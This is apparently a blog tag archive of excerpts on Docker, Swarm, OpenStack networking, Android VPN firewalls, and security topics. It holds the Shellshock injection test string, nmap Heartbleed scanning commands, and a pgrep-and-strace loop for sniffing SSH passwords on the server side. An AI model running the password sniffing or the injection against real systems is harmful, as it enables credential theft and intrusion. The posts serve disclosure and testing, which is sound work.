Tag Archives: Network

I needed a way to monitor Docker resource usage and metrics (CPU, Memory, Network, Disk). I also wanted historical data, and ideally, pretty graphs that I could navigate and drill into.

Whatever the solution was going to be, it had to be very open and customizable, easy to set up and scale for a production-like environment (stability, size), and ideally cheap/free. But most of all, it had to make sense and be really straightforward.

3 Containers and 10 minutes is all you need


There are 3 components that are started via containers:

Grafana (dashboard/visual metrics and analytics)
InfluxDB (time-series DB)
Telegraf (time-series collector) – 1 per Docker host

The idea is that you first launch Grafana, and then launch InfluxDB. You configure Grafana (via the web) to point to InfluxDB’s IP, and then you setup a Telegraf container on each Docker host that you want to monitor. Telegraf collects all the metrics and feeds them into a central InfluxDB, and Grafana displays them.
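The launch itself is only a few commands. A minimal sketch, assuming the official Grafana, InfluxDB, and Telegraf images from Docker Hub with their default ports (the telegraf.conf path is a made-up example; the full setup is behind the link below):

```shell
# Dashboard (web UI on port 3000)
docker run -d --name grafana -p 3000:3000 grafana/grafana

# Time-series DB (HTTP API on port 8086)
docker run -d --name influxdb -p 8086:8086 influxdb:1.8

# One collector per Docker host; it needs the Docker socket to read
# container stats, and a telegraf.conf pointing at InfluxDB's IP
docker run -d --name telegraf \
  -v /var/run/docker.sock:/var/run/docker.sock \
  -v /etc/telegraf/telegraf.conf:/etc/telegraf/telegraf.conf:ro \
  telegraf
```

Once all three are up, you add InfluxDB as a data source in the Grafana web UI and build dashboards from the Telegraf measurements.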

Setup Tutorial/Examples

Continue Reading → Monitor Docker resource metrics with Grafana, InfluxDB, and Telegraf

If you have not used Swarm, skim the non-service-discovery tutorial first to get a feel for how it works:
https://blog.vpetkov.net/2015/12/07/docker-swarm-tutorial-and-examples. It's very easy, and it should give you a good idea within a couple of minutes.

Using Swarm with pre-generated static tokens is useful, but there are many benefits to using a service discovery backend. For example, you can utilize network overlays and have common "bridges" that span multiple hosts (https://docs.docker.com/engine/userguide/networking/get-started-overlay/). It also provides service registration and discovery for the Docker containers launched into the Swarm. Now let's get into how to use it with service discovery, which is what you would use in a scaled-out/production environment.

Again, assuming you have a bunch of servers running docker:
vm01, vm02, vm03, vm04

Normally, you can run "docker ps" on each host, for example:
ssh vm01 'docker ps'
ssh vm04 'docker ps'

If you enable the API for remote bind on each host you can manage them from a central place:
docker -H tcp://vm01:2375 ps
docker -H tcp://vm04:2375 ps
(note: the port is optional; 2375 is the default)
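For reference, enabling that remote bind is a one-line change to how the engine is started. A sketch (these are standard dockerd options; where you put them varies by distro and init system):

```shell
# Listen on TCP in addition to the local unix socket
# (e.g. via DOCKER_OPTS in /etc/default/docker, or directly:)
dockerd -H unix:///var/run/docker.sock -H tcp://
# Note: plain 2375 is unauthenticated and unencrypted; outside a lab,
# use tcp://...:2376 with --tlsverify/--tlscacert/--tlscert/--tlskey
```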

But if you want to use all of these docker engines as a cluster, you need Swarm.
Here we will go one step further and use a common service discovery backend (Consul).
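As a preview of where this is going, classic (standalone) Swarm takes a discovery URL, which in the Consul case looks roughly like this (all IPs and the progrium/consul image are placeholders/assumptions; the full walkthrough is behind the link below):

```shell
# On one node: run a Consul server (progrium/consul was the common image at the time)
docker run -d -p 8500:8500 --name consul progrium/consul -server -bootstrap

# Swarm manager, pointed at Consul for discovery
docker run -d -p 4000:2375 swarm manage consul://<consul-ip>:8500

# On every Docker host: join the cluster, advertising that host's engine
docker run -d swarm join --advertise=<host-ip>:2375 consul://<consul-ip>:8500

# Then talk to the whole cluster through the manager
docker -H tcp://<manager-ip>:4000 ps
```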

Docker Swarm Tutorial with Consul and How-To/Examples

Continue Reading → Docker Swarm Tutorial with Consul (Service Discovery) and Examples

A bit of background and the “old/normal way”

If you use Docker, you very quickly run into a common question: how do you make Docker work across multiple hosts, datacenters, and different clouds? One of the simplest solutions is Docker Swarm. Docker summarizes it best as "native clustering for Docker…[which] allows you [to] create and access a pool of Docker hosts using the full suite of Docker tools."

One of the biggest benefits to using Docker Swarm is that it provides the standard Docker API, which means that all of the existing Docker management tools (and 3rd party products) just work out of the box as they do with a single host. The only difference is that they now scale transparently over multiple hosts.

After reading up on it HERE and HERE, it was evident that this is a pretty simple service, but it wasn't 100% clear what went where. After searching around the web, I realized that almost all of the tutorials and examples on Docker Swarm involved either docker-machine or very convoluted setups which did not explain what was happening on which component. With that said, here is a very simple Docker Swarm tutorial with some practical examples.

Assuming you have a bunch of servers running docker:
vm01, vm02, vm03, vm04

Continue Reading → Docker Swarm Tutorial and Examples

As some of you may have heard, a very serious remote vulnerability in bash was discovered and disclosed today.

A quick summary of the problem is that bash does not properly process function definitions, which can be exported like shell variables. This is a bit like a SQL/XSS injection problem: you provide an "end" to your input, and continue writing other functions/calls after it, which then get executed.

A quick example:
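The snippet itself is missing from this archive; the widely circulated one-liner (the variable name x matches the warning messages quoted below) is:

```shell
# A crafted "function definition" with a trailing command smuggled after it.
# A vulnerable bash executes the trailing command while importing the
# variable, printing "vulnerable" before "this is a test"; a patched bash
# only prints "this is a test" (plus the warnings shown below).
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
```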

A vulnerable system looks like this:

A patched system looks like this:
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'

Continue Reading → Bash remote exploit vulnerability

UPDATE: Insecure.Org has released nmap v6.46, which contains all of these patches. Just grab the latest and follow the usage info here

If you don’t know what Heartbleed is, you can find out here: http://heartbleed.com/. If you don’t want to read the details above, XKCD put together a great short comic about it: http://xkcd.com/1354/

NOTE: I first put this together 3 days ago, but I am just now releasing after being asked by many people for the package and directions.

The problem: how do you scan a bit more than 5 class B's (~328,000 IP addresses) before any of the vendors (Tenable, Qualys, Rapid7) have released signatures? Easy – you build your own!
The goal was to scan as many IPs as possible at work as quickly as possible.

After using the Heartbleed github project (https://github.com/FiloSottile/Heartbleed) and creating a Dancer web service around it, I realized that there still needed to be a faster way to scan for this. How much faster?

How about a /24 (254 IP addresses) in less than 10 seconds.

I have a patched version of NMAP already (6.40) that has Heartbleed checks.
Again, Insecure.Org has released v6.46, which includes these patches. Grab that and follow these directions

Then, you can scan like this:
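The scan command itself didn't survive the archive; with the ssl-heartbleed script in place it looks roughly like this (the subnet is a placeholder, and the timing flags are one way to hit the speed described above):

```shell
# -p 443: only probe HTTPS; --script ssl-heartbleed runs the detection check
# -T4 plus a large host group lets nmap sweep a /24 in seconds
nmap -p 443 --script ssl-heartbleed -T4 --min-hostgroup 254
```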


If you want cleaner results, for a script, a good way to filter the output is with something like this:
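The filter itself is missing here; a grep over the scan output produces the 2-line result described below. Since running the real scan needs the patched nmap, this demo pipes simulated scan output (assumed format) through the same filter:

```shell
# Real usage (assumes the patched nmap from the post):
#   nmap -p 443 --script ssl-heartbleed <subnet> | grep -E 'Nmap scan report|ssl-heartbleed'

# Simulated scan output, to show what the filter keeps
# (prints the host line plus the "| ssl-heartbleed:" line, nothing else):
printf '%s\n' \
  'Nmap scan report for 10.0.0.5' \
  'Host is up (0.0010s latency).' \
  'PORT    STATE SERVICE' \
  '443/tcp open  https' \
  '| ssl-heartbleed:' \
  '|   VULNERABLE:' |
  grep -E 'Nmap scan report|ssl-heartbleed'
```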

This produced a clean 2-line result: if a host is vulnerable, it will have an "ssl-heartbleed" line under its host/IP address entry.


How to build your own patched NMAP binary?

But what if you don’t trust my binary? Good – let me show you how to build one yourself:
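The full walkthrough continues behind the link; the general shape at the time (the /path/to/ filenames are assumptions) was a stock source build with the detection script dropped in:

```shell
# Fetch and unpack the nmap 6.40 source
wget https://nmap.org/dist/nmap-6.40.tar.bz2
tar xjf nmap-6.40.tar.bz2 && cd nmap-6.40

# Drop in the ssl-heartbleed NSE script and the tls.lua library it needs
# (both circulated on the nmap dev list shortly after disclosure)
cp /path/to/ssl-heartbleed.nse scripts/
cp /path/to/tls.lua nselib/

# Build and install
./configure && make && sudo make install
```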

Continue Reading → Ridiculously fast Heartbleed Subnet Scanner – nmap heartbleed howto and tutorial

Setting up the network interfaces is something that seems to give people a hard time (clearly visible here: http://docs.openstack.org/grizzly/basic-install/apt/content/basic-install_network.html). If you follow that guide, one of the most confusing points is how the Open vSwitch fits into the existing architecture.

Assuming you are following the guide, you have 2 networks: one private, one public.

Your Network Controller, again per the guide, will have an internal-network interface and an external-network interface.

Your starting network config (/etc/network/interfaces) file will look like this:
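The file contents were lost here; a sketch of the usual pre-OVS starting point (interface names and addresses are placeholders, not the guide's actual values):

```text
# /etc/network/interfaces (before Open vSwitch)
auto lo
iface lo inet loopback

# internal (private) network
auto eth0
iface eth0 inet static
    address <internal-ip>
    netmask <internal-netmask>

# external (public) network
auto eth1
iface eth1 inet static
    address <external-ip>
    netmask <external-netmask>
    gateway <external-gateway>
```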

Now, you will first install the packages needed:
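On Ubuntu of that era, the packages were roughly these (exact names depend on the release):

```shell
# Open vSwitch itself plus the DKMS-built datapath kernel module
apt-get install -y openvswitch-switch openvswitch-datapath-dkms
```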

Then you will start the Open vSwitch:
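Starting the switch and creating the bridges the guide's setup expects looks like this (br-int/br-ex are the guide's conventional names; eth1 as the external NIC is an assumption):

```shell
service openvswitch-switch start

# Integration bridge (used by the Quantum agents)
ovs-vsctl add-br br-int
# External bridge, with the public-facing NIC attached to it
ovs-vsctl add-br br-ex
ovs-vsctl add-port br-ex eth1
```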

Continue Reading → OpenStack – Network Controller – Open vSwitch – Network Interfaces Config

The Scenario:

Let's say you are at a coffee shop with public internet access, and you don't want someone snooping on your traffic, so you VPN to your work. However, you also don't want to tunnel personal stuff (chat, Facebook, YouTube, maybe your personal email?) out of your work VPN. So the question becomes: how do you create 2 different firewalls? One that ONLY allows you to VPN and does not allow any other applications access, and one that then controls the traffic within the VPN channel so that you can utilize the connection for some apps but not others.

At this point, there are only 2 "methods" of running a firewall on Android: having root and managing IPTables, or the only alternative, creating a sub-VPN channel that you pipe the traffic over and filter (which does not require root). Unfortunately, the second type (without root) will not work for this, since we need to utilize the VPN channel ourselves for our VPN, and to my knowledge, Android lets you set up only 1 active VPN channel. So, you need 1.) a way to root and 2.) a good firewall.
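With root, the two "firewalls" map onto plain iptables rules. A sketch (the UID and interface names are made-up examples; Android gives each app its own UID, and the owner match filters on it):

```shell
WLAN=wlan0        # real network interface (assumed name)
TUN=tun0          # VPN tunnel interface (assumed name)
VPN_UID=10123     # hypothetical UID of the VPN client app

# Firewall 1: outside the tunnel, ONLY the VPN app may send traffic
iptables -A OUTPUT -o "$WLAN" -m owner --uid-owner "$VPN_UID" -j ACCEPT
iptables -A OUTPUT -o "$WLAN" -j DROP

# Firewall 2: inside the tunnel, control which traffic rides over it
iptables -A OUTPUT -o "$TUN" -p tcp --dport 5222 -j DROP   # e.g. block XMPP chat
iptables -A OUTPUT -o "$TUN" -j ACCEPT
```

In practice apps like AFWall+ generate rules of this shape for you; the point is that both layers are just iptables chains once you have root.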

Continue Reading → Firewall the Inside of your OpenVPN or L2TP/IPSec Tunnel on Android

I read an interesting article last night which highlighted some problems with the way SSH process communication happens. I am writing a post about it because it is so simple and yet so effective.

Here is the scenario:
Let's say that you have a Linux system running the latest set of patches/OpenSSH. You have multiple users on the system, and one or more of them have sudo/su/escalated privileges. The idea is that when user 'A' connects to the system, user 'C' will be able to sniff out their password.

The details:
Almost all ssh daemons are configured by default to use "Privilege Separation". This means that sshd spawns an unprivileged child process to listen for incoming network requests. After the user authenticates, another process is created running as the authenticated user. The magic happens in between these two processes.

A simple example:
User 'C' ssh-es into the system, escalates their privileges (either by legitimate or non-legitimate means) and starts listening for newly created ssh 'net' processes. As soon as user 'C' sees a process being created, they immediately attach strace to it.

A simple way to do it is by:

or even better:
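The original one-liners are missing from this archive; the general idea, sketched (the process-name pattern and the exact syscalls worth watching vary by distro and OpenSSH version):

```shell
# Wait for sshd to fork the unprivileged "net" child during an authentication...
while ! pgrep -f 'sshd.*\[net\]' >/dev/null; do sleep 0.1; done
pid=$(pgrep -f 'sshd.*\[net\]' | head -1)

# ...then attach strace and watch the traffic between the privileged parent
# and the child: the password crosses that boundary in cleartext
strace -p "$pid" -e trace=read,write 2>&1 | grep -i -A2 pass
```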


Continue Reading → Sniffing SSH Password from the Server Side